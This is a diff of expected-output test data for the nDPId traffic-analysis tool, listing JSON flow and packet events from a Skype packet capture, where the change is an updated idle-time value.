-00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1702,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970692464,"flow_last_seen":1431970692464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970692464,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51301,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1702,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1431970692464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970692464,"pkt":"0NQSxnP1PBXCt3IOCABFAABAG0ZAAEAGm9bAqAEiUuBu8chll+8qmATQAAAAALAC\/\/9+NAAAAgQFtAEDAwUBAQgKPjJnPQAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1705,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":2,"flow_last_seen":1431970692533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970692533,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8K7ZAAHIGWWpS4G7xwKgBIpfvyGV1sVenKpgE0aASIACFcQAAAgQFrAEDAwgEAggKAAccXD4yZz0="} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1706,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":3,"flow_last_seen":1431970692533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970692533,"pkt":"0NQSxnP1PBXCt3IOCABFAAA061FAAEAGy9bAqAEiUuBu8chll+8qmATRdbFXqIAQECzDxgAAAQEICj4yZ4EABxxc"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1753,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970693196,"flow_last_seen":1431970693196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970693196,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1753,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1431970693196,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970693196,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWFNAAEAG7F7AqAEiW77YfchmAbumoVhjAAAAALAC\/\/\/PlQAAAgQFtAEDAwUBAQgKPjJqCAAAAAAEAgAA"} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":2,"flow_last_seen":1431970693239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970693239,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0PUNAAPUGUnJbvth9wKgBIgG7yGaCZHojpqFYZIASH\/6TZAAAAgQFoAEDAwQBAQQC"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1755,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":3,"flow_last_seen":1431970693239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970693239,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoI6NAAEAGISfAqAEiW77YfchmAbumoVhkgmR6JFAQIADUHQAA"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970694308,"flow_last_seen":1431970694308,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970694308,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51303,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1431970694308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970694308,"pkt":"0NQSxnP1PBXCt3IOCABFAABA0wpAAEAGAQ3AqAEiUHlUXchn861MQWgbAAAAALAC\/\/+zaQAAAgQFtAEDAwUBAQgKPjJuTgAAAAAEAgAA"} -00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1791,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970689672,"flow_last_seen":1431970694329,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2899,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1431970694329,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51294,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1812,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":2,"flow_last_seen":1431970695316,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970695316,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwedAAEAGEjDAqAEiUHlUXchn861MQWgbAAAAALAC\/\/+vgAAAAgQFtAEDAwUBAQgKPjJyNwAAAAAEAgAA"} 
-00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1817,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970695865,"flow_last_seen":1431970695865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970695865,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51305,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1817,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1431970695865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970695865,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWQRAAEAGas3AqAEilQ0gD8hpNFCsfgF7AAAAALAC\/\/9i1QAAAgQFtAEDAwUBAQgKPjJ0WwAAAAAEAgAA"} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":2,"flow_last_seen":1431970695908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970695908,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyGm+xiHqrH4BfKASOJCW7wAAAgQFrAQCCAo\/i4QRPjJ0WwEDAwk="} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":3,"flow_last_seen":1431970695908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970695908,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0yZ5AAEAG+j7AqAEilQ0gD8hpNFCsfgF8vsYh64AQECzt7wAAAQEICj4ydIU\/i4QR"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1821,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970695909,"flow_last_seen":1431970695909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970695909,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51306,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1821,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1431970695909,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970695909,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2LhAAEAG+17AqAEiUHlUXchq861iaxDLAAAAALAC\/\/\/uVQAAAgQFtAEDAwUBAQgKPjJ0hQAAAAAEAgAA"} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":3,"flow_last_seen":1431970696322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970696322,"pkt":"0NQSxnP1PBXCt3IOCABFAABAkb9AAEAGQljAqAEiUHlUXchn861MQWgbAAAAALAC\/\/+rmAAAAgQFtAEDAwUBAQgKPjJ2HwAAAAAEAgAA"} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1838,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":2,"flow_last_seen":1431970696915,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970696915,"pkt":"0NQSxnP1PBXCt3IOCABFAABAStVAAEAGiULAqAEiUHlUXchq861iaxDLAAAAALAC\/\/\/qbAAAAgQFtAEDAwUBAQgKPjJ4bgAAAAAEAgAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1702,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970692464,"flow_last_seen":1431970692464,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970692464,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51301,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1702,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1431970692464,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970692464,"pkt":"0NQSxnP1PBXCt3IOCABFAABAG0ZAAEAGm9bAqAEiUuBu8chll+8qmATQAAAAALAC\/\/9+NAAAAgQFtAEDAwUBAQgKPjJnPQAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1705,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":2,"flow_last_seen":1431970692533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970692533,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8K7ZAAHIGWWpS4G7xwKgBIpfvyGV1sVenKpgE0aASIACFcQAAAgQFrAEDAwgEAggKAAccXD4yZz0="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1706,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":3,"flow_last_seen":1431970692533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970692533,"pkt":"0NQSxnP1PBXCt3IOCABFAAA061FAAEAGy9bAqAEiUuBu8chll+8qmATRdbFXqIAQECzDxgAAAQEICj4yZ4EABxxc"} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1753,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970693196,"flow_last_seen":1431970693196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970693196,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1753,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1431970693196,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970693196,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWFNAAEAG7F7AqAEiW77YfchmAbumoVhjAAAAALAC\/\/\/PlQAAAgQFtAEDAwUBAQgKPjJqCAAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":2,"flow_last_seen":1431970693239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970693239,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0PUNAAPUGUnJbvth9wKgBIgG7yGaCZHojpqFYZIASH\/6TZAAAAgQFoAEDAwQBAQQC"} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1755,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":3,"flow_last_seen":1431970693239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970693239,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoI6NAAEAGISfAqAEiW77YfchmAbumoVhkgmR6JFAQIADUHQAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970694308,"flow_last_seen":1431970694308,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970694308,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51303,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1431970694308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970694308,"pkt":"0NQSxnP1PBXCt3IOCABFAABA0wpAAEAGAQ3AqAEiUHlUXchn861MQWgbAAAAALAC\/\/+zaQAAAgQFtAEDAwUBAQgKPjJuTgAAAAAEAgAA"} 
+00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1791,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970689672,"flow_last_seen":1431970694329,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2899,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1431970694329,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51294,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1812,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":2,"flow_last_seen":1431970695316,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970695316,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwedAAEAGEjDAqAEiUHlUXchn861MQWgbAAAAALAC\/\/+vgAAAAgQFtAEDAwUBAQgKPjJyNwAAAAAEAgAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1817,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970695865,"flow_last_seen":1431970695865,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970695865,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51305,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1817,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1431970695865,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970695865,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWQRAAEAGas3AqAEilQ0gD8hpNFCsfgF7AAAAALAC\/\/9i1QAAAgQFtAEDAwUBAQgKPjJ0WwAAAAAEAgAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":2,"flow_last_seen":1431970695908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970695908,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyGm+xiHqrH4BfKASOJCW7wAAAgQFrAQCCAo\/i4QRPjJ0WwEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":3,"flow_last_seen":1431970695908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970695908,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0yZ5AAEAG+j7AqAEilQ0gD8hpNFCsfgF8vsYh64AQECzt7wAAAQEICj4ydIU\/i4QR"} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1821,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970695909,"flow_last_seen":1431970695909,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970695909,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51306,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1821,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1431970695909,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970695909,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2LhAAEAG+17AqAEiUHlUXchq861iaxDLAAAAALAC\/\/\/uVQAAAgQFtAEDAwUBAQgKPjJ0hQAAAAAEAgAA"} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":3,"flow_last_seen":1431970696322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970696322,"pkt":"0NQSxnP1PBXCt3IOCABFAABAkb9AAEAGQljAqAEiUHlUXchn861MQWgbAAAAALAC\/\/+rmAAAAgQFtAEDAwUBAQgKPjJ2HwAAAAAEAgAA"} 
+00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1838,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":2,"flow_last_seen":1431970696915,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970696915,"pkt":"0NQSxnP1PBXCt3IOCABFAABAStVAAEAGiULAqAEiUHlUXchq861iaxDLAAAAALAC\/\/\/qbAAAAgQFtAEDAwUBAQgKPjJ4bgAAAAAEAgAA"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1844,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":3,"flow_last_seen":1431970697334,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970697334,"pkt":"0NQSxnP1PBXCt3IOCABFAAAu+HkAAEARZmnAqAEirjGr4DLdfQsAGpXefcACJf2u8qgkatcYbdd0gE\/+"} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1845,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":3,"flow_last_seen":1431970697334,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970697334,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuk3UAAEARxbPAqAEiUx8MrTLdXYMAGjJQfcIC\/PmkO\/ZLL41O1l2CVTPo"} 
-00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1847,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970697478,"flow_last_seen":1431970697478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970697478,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1847,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1431970697478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970697478,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/r1AAEAGxRPAqAEilQ0gD8hrNFBkkG+ZAAAAALAC\/\/82XwAAAgQFtAEDAwUBAQgKPjJ6nwAAAAAEAgAA"} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1848,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":2,"flow_last_seen":1431970697521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970697521,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyGvw2U4ZZJBvmqASOJDuMgAAAgQFrAQCCAo\/iaIXPjJ6nwEDAwk="} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1849,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":1431970697522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970697522,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05GtAAEAG33HAqAEilQ0gD8hrNFBkkG+a8NlOGoAQECxFMgAAAQEICj4yeso\/iaIX"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1850,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970697522,"flow_last_seen":1431970697522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970697522,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 